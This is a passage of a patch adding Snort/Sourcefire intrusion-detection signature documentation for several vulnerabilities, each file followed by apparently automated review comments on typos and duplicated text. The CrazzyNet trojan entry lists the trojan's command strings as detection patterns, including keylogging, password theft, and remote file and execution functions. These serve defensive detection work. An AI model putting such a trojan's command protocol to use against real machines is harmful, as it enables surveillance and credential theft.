+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
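Review bot: Attack Scenarios ("An attacker can access an authentication mechanism and supply his/her own credentials...") describes a credential attack, not the remote file include via the "lm_path" parameter given in the Summary and Detailed Information; the same boilerplate appears in the third paragraph of Detailed Information ("running ona web server. Some applications do not perform stringent checks when validating the credentials...") and both should be replaced with the file-include scenario. Typos: "ona web server", "attackers choosing"; the phrase "an exploitation attempt has been attempted" is redundant. Additional References is empty and the Sid block lacks the blank line before "--".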
--- /dev/null
+++ b/doc/signatures/3460.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid: 
+3460
+
+--
+Summary:
+This event is generated when a numeric argument to the REST command is
+detected.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is generated
+when a numeric argument to the REST command is detected.
+
+If a numeric argument is supplied to the REST command on an affected
+HP-UX system, it may be possible for an attacker to discover the
+contents of a particular memory location identified by the argument.
+This may in turn lead to the disclosure of sensitive information on the
+host.
+
+--
+Affected Systems:
+	HP-UX 11.0 utilizing HP-UX ftpd 1.1.214 .4
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple. Exploit code is not needed but code does exist.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
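Review bot: the Attack Scenarios section is empty; Detailed Information already supplies the scenario (a numeric argument to REST on an affected HP-UX ftpd disclosing the memory location the argument identifies), so restate it there. The Summary mentions "the REST command" without saying it is an FTP command; add "FTP" so the event is understood without reading the detail. Affected Systems has a stray space in the version "HP-UX ftpd 1.1.214 .4". Additional References is empty for a vulnerability tied to a specific vendor build.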
--- /dev/null
+++ b/doc/signatures/2958.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2958
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
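Review bot: the body of this file is identical to 2947.txt apart from the Sid, so the Detailed Information never tells an analyst what distinguishes sid 2958 from sid 2947 (which NetDDE message, field or port this rule keys on); add a sentence saying what this rule specifically matches. Minor: "Serious. Execution of arbitrary code with system level privileges" and "Apply the appropriate vendor supplied patches" are missing their terminating periods.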
--- /dev/null
+++ b/doc/signatures/1447.txt
@@ -0,0 +1,64 @@
+Rule:
+--
+Sid:
+1447
+
+--
+Summary:
+This event is generated when a malicious packet is sent to the Microsoft Terminal Server port.
+
+--
+Impact:
+Denial of service.  Sending repeated packets may cause a denial of service by consuming all available memory resources.
+
+--
+Detailed Information:
+A flaw exists in the Microsoft Terminal Server port on certain versions of Windows that may cause a denial of service of the vulnerable host by consuming all available memory resources.  This attack requires multiple malicious packets to cause a denial of service.
+
+--
+Affected Systems:
+Microsoft Windows 2000 Advanced Server SP2
+Microsoft Windows 2000 Advanced Server SP1
+Microsoft Windows 2000 Advanced Server
+Microsoft Windows 2000 Datacenter Server SP2
+Microsoft Windows 2000 Datacenter Server SP1
+Microsoft Windows 2000 Datacenter Server
+Microsoft Windows 2000 Server SP2
+Microsoft Windows 2000 Server SP1
+Microsoft Windows 2000 Server
+Microsoft Windows NT Terminal Server 4.0
+
+--
+Attack Scenarios:
+An attacker may attempt to cause a denial of service against a vulnerable server by sending repeated malicious packets.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patches discussed in Microsoft Security Bulletin MS01-040.
+Block access to the Microsoft Terminal Server port from outside the network.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0540
+
+--
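Review bot: Corrective Action says "Apply the patches discussed in Microsoft Security Bulletin MS01-040." but Additional References lists only the CVE entry; add the MS01-040 bulletin URL there so the two sections agree (2958.txt shows the format used for bulletin links). The Summary and Detailed Information also never say what makes the packet "malicious" or which port is meant by "the Microsoft Terminal Server port", so the Impact claim "consuming all available memory resources" cannot be tied to anything the rule matches; name the port and the packet characteristic the rule keys on.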
--- /dev/null
+++ b/doc/signatures/100000719.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000719
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "index.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
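Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials...") is credential-checking boilerplate that does not describe a remote file include through the "phpraid_dir" parameter and should be dropped or rewritten around that parameter; it also carries the typo "ona". In the Summary, "an exploitation attempt has been attempted" is redundant ("an exploitation attempt has been made"), and "attackers choosing" needs an apostrophe. Affected Systems lacks the blank line before "--" used elsewhere in the patch, and Additional References is empty although a specific application, script and parameter are named.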
--- /dev/null
+++ b/doc/signatures/2947.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2947
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
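Review bot: this file repeats the body of 2958.txt word for word, so nothing in its Detailed Information says what sid 2947 matches as opposed to sid 2958; state the NetDDE message, field or port this rule covers. Minor: "Serious. Execution of arbitrary code with system level privileges" and "Apply the appropriate vendor supplied patches" lack terminating periods.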
--- /dev/null
+++ b/doc/signatures/1085.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1085
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
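Review bot: neither the Summary ("a known vulnerability in a PHP web application") nor the Detailed Information identifies the application, script or request pattern the rule matches, so an analyst cannot triage the alert from this page; name what the rule looks for. Typos: "running ona web server" should be "on a web server", and "the attackers choosing" (twice) needs an apostrophe. Additional References is empty.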
--- /dev/null
+++ b/doc/signatures/1152.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1152
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
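Review bot: the Detailed Information is entirely generic ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion.") and is shared verbatim with 1881.txt, so the page does not say what request pattern sid 1152 matches; add that so the alert can be triaged. Minor: "the attackers choosing" needs an apostrophe.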
--- /dev/null
+++ b/doc/signatures/1881.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1881
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
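Review bot: the body of this file is identical to 1152.txt, so nothing here distinguishes sid 1881 from sid 1152 or says what request pattern it matches; replace the generic "Many known vulnerabilities exist for each implementation" text with the specific path or parameter the rule keys on. Minor: "the attackers choosing" needs an apostrophe.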
--- /dev/null
+++ b/doc/signatures/909.txt
@@ -0,0 +1,62 @@
+SID:
+909
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
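Review bot: this file does not follow the section layout used by every other file in the patch: it opens with "SID:" before "Rule:", places the "--" separator before each heading instead of after the section body, and ends with "References:" rather than "Additional References:", so anything that splits these files on the common headers will read it differently; reorder it to the shared template. Typos: "This even indicates" (event), "This data can be accesses" (accessed), "at type of writing" (time), and "Medium, Attackers need" should be "Medium. Attackers need".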
--- /dev/null
+++ b/doc/signatures/2765.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2765
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_column_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
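Review bot: the Detailed Information breaks a sentence across lines so that one line begins with a period ("vulnerability in the procedure drop_column_group" / ". This procedure is included in" / "dbms_repcat."); join these into one sentence. Affected Systems reads "Oracle Oracle9i" (duplicated word), and several separator lines carry trailing whitespace ("-- ") while others do not. Additional References is empty even though the vulnerable package and procedure are named; add the Oracle alert for the issue if one is known.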
--- /dev/null
+++ b/doc/signatures/2735.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2735
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_char
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
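Review bot: same broken sentence as in 2765.txt, here around alter_priority_char ("vulnerability in the procedure alter_priority_char" / ". This procedure is included in" / "dbms_repcat."); join the lines so the period is not orphaned at the start of a line. "Oracle Oracle9i" duplicates the vendor name, separators mix "--" and "-- ", and Additional References is empty although the package and procedure are named.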
--- /dev/null
+++ b/doc/signatures/3242.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3242
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
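Review bot: the Attack Scenarios text ("An attacker may make a request for a file with an overly long filename via a network share.") does not match the Detailed Information, which describes malformed DCOM requests sent to an RPC port; either explain how the long filename reaches the RPC service or rewrite the scenario around the malformed RPC request. The same body appears verbatim in 3212.txt, 3279.txt and 3321.txt, so nothing says what sid 3242 matches as opposed to those (the Corrective Action's list of "RPC ports 135, 139 and 445 for both TCP and UDP" suggests the rules are split by port or transport, and the Detailed Information should say which). Typo: "Expoit code exists". Additional References is empty; add the Microsoft bulletin link in the format 2958.txt uses.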
--- /dev/null
+++ b/doc/signatures/3212.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3212
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
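Review bot: this file is a verbatim copy of the 3242.txt body with only the Sid changed, so it does not say which port or transport sid 3212 covers; add that to the Detailed Information. The Attack Scenarios sentence about "a file with an overly long filename via a network share" also sits oddly beside a Detailed Information that talks only about malformed RPC requests, and "Expoit code exists" is a typo. Additional References is empty.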
--- /dev/null
+++ b/doc/signatures/3321.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3321
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
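Review bot: identical body to 3242.txt and 3212.txt, so the Detailed Information does not say what sid 3321 matches as opposed to those sids (presumably one of the ports or transports listed under Corrective Action); state it. The Attack Scenarios sentence about an overly long filename on a network share does not follow from the RPC description above it, "Expoit" is a typo, and Additional References is empty.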
--- /dev/null
+++ b/doc/signatures/3064.txt
@@ -0,0 +1,158 @@
+Rule: 
+
+--
+Sid: 
+3064
+
+-- 
+Summary: 
+This event is generated when an attempt is made by the victim to send a
+connection confirmation to the attacker using the CrazzyNet trojan.
+
+-- 
+Impact: 
+If connected, the attacker could remotetly execute a multitude of functions
+resulting in a full compromise of the victim's machine.
+
+--
+Detailed Information:
+CrazzyNet uses port 17499. CrazzyNet has a number of functions. Each function is
+associated with an attack signal string
+that is sent to the victim. Be suspicious of the following strings:
+
+Format: Function Name - String To Look For
+
+Add Line To File - addlin
+Overwrite File With Added Line - ovwlin
+Add Icon To Desktop - addico
+Beep Sound - sndbep
+Change Windows Control Text - chgawc
+Change Resolution - chgres
+Chat - chatwy
+Get Clipboard Text - clpget
+Crazy Mouse On - crazym;1
+Crazy Mouse Off - crazym;0
+Delete File/Directory - delete
+Remove Windows Functions - remwma;0
+Download File - getfil
+Disable Ctl-Alt-Del - discad;0
+Enable Ctl-Alt-Del - discad;1
+Disable Windows Startup - wndsas;0
+Enable Windows Startup - wndsas;1
+Find Files - findfi
+Format - format
+Get Colors - getcol
+Get Computer Name - getcon
+Set Computer Name - setcon
+Get Date - gettad
+Set Date - settad
+Get Internet Explorer Start Page - geties
+Set Internet Explorer Start Page - chgies
+Get Mouse Position - getpos
+Set Mouse Position - setmse
+Get Clients Connected - geticc
+Get Computer Information - getinf
+Hide Picture - hidpic
+List Installed Programs - asplst
+Keylogger - keylog;1
+Kill Mouse - kilmse
+List Files And Directories - nextdr
+List ICQ - icqlst
+List Of Apps - lstapp
+Make Directory - makdir
+Monitor On - onmoni
+Monitor Off - ofmoni
+Get Mouse Double Click Time - getdcl
+Set Mouse Double Click Time - setdcl
+Open CD - opencd
+Close CD - closcd
+Ping - *ICMP Packet* Echo this string of data
+Play Sound - playsd
+Print Text - printt
+Refresh File Listing - refdir
+Run File - runfil
+Screen Dump - screen
+Get Screensaver - getfon
+Set Screensaver - setscr
+Enable Scrolling Text - scroll
+Disable Scrolling Text - sscrol
+Send To URL - senurl
+Send Key - runkey
+Send Message - msgbox
+Set Clipboard Text - clpset
+Set Desktop Image - chgdes
+Show Clock - sclock;1
+Hide Clock - sclock;0
+Show Desktop Icons - deskic;1
+Hide Desktop Icons - deskic;0
+Show Start Bar - startb;1
+Hide Start Bar - startb;0
+Show Task Bar - sotask
+Hide Task Bar - hitask
+Show Task Bar Icons - staskb;1
+Hide Task Bar Icons - staskb;0
+Show Picture - shopic
+Start CD loop - cdloop;1
+Stop CD loop - cdloop;0
+Steal Passwords - geticp
+Swap Mouse Buttons On - swpmse;1
+Swap Mouse Buttons Off - swpmse;0
+Terminate Application - terapp
+Get Text Box Cursor Blink Rate - getret
+Set Text Box Cursor Blink Rate - setret
+Upload File - uplfil
+Change Volume - volume
+Warp On - warpon
+Warp Off - warpof
+List Windows - wndlst
+
+-
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because
+they often can be backdoors in disguise. 
+Once the victim has unknowingly installed the server, the attacker will usually
+employ an IP scanner tool to find vulnerable 
+systems. Once an IP is found, the attacker simply has to make the connection.
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has
+installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action:
+CrazzyNet copies itself to C:\WINDOWS\Registry32.exe
+Delete the registry key Reg32=Registry32.exe found in
+HKCUU\Software\Microsoft\Windows\CurrentVersion\Run 
+Delete Registry32.exe from Win.ini and System.ini
+If found, delete Registry32.exe and server.exe
+Make sure to keep your virus definitions updated on your anti-virus software.
+
+--
+Contributors:
+Original Rule Writer: Ricky Macatee <rmacatee@sourcefire.com> 
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+Pestpatrol:
+http://www.pestpatrol.com/PestInfo/C/CrazzyNet.asp
+
+--
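Review bot: the registry path in Corrective Action, "HKCUU\Software\Microsoft\Windows\CurrentVersion\Run", has a typo ("HKCUU" for "HKCU"), and the separator before Affected Systems is a single "-" where every other section uses "--". The Summary says the rule fires on the victim's connection confirmation to the attacker, but the Detailed Information then lists the attacker-to-victim command strings ("Be suspicious of the following strings"); say explicitly which direction and which string this sid matches so the long table is not mistaken for the rule's own pattern. Typo: "remotetly". The Attack Scenarios and Ease of Attack sections also have inconsistent blank lines around their "--" separators.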
--- /dev/null
+++ b/doc/signatures/879.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+879
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
